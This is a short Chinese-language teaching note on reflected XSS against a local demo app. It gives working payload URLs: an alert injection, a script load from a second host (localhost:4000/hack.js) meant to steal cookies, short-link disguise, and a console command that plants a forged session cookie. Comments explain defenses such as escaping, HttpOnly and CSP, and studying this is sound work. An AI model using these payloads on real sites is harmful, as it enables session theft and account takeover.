XSS

// 正常访问：from 参数为普通文本
http://localhost:3000/?from=china 
// alert 尝试：若服务端把 from 参数未经 HTML 转义直接输出到页面，这段脚本就会执行（反射型 XSS）；输出时按上下文做转义即可阻止
http://localhost:3000/?from=<script>alert(3)</script> 
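// 获取 Cookie：同一注入点改为加载外部脚本（hack.js 的内容本文未给出），脚本可读取 document.cookie；会话 Cookie 设置 HttpOnly 后脚本无法读取，CSP 的 script-src 也能限制外部脚本加载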
http://localhost:3000/?from=<script src="http://localhost:4000/hack.js"> </script> 
// 短域名伪装：短链接会隐藏带参数的真实 URL，排查可疑链接时需先还原其真实地址
https://dwz.cn/ 
// 伪造 Cookie 登录（在 Chrome 控制台执行）：把会话 Cookie 写入浏览器即可冒用该会话；下面的值只是 Base64 编码的 JSON（用户名、过期时间），并未加密，服务端需校验签名并支持让会话失效
document.cookie="t8t-auth:token=eyJ1c2VybmFtZSI6Imxhb3dhbmciLCJfZXhwaXJlIjoxNTUzNT Y1MDAxODYxLCJfbWF4QWdlIjo4NjQwMDAwMH0="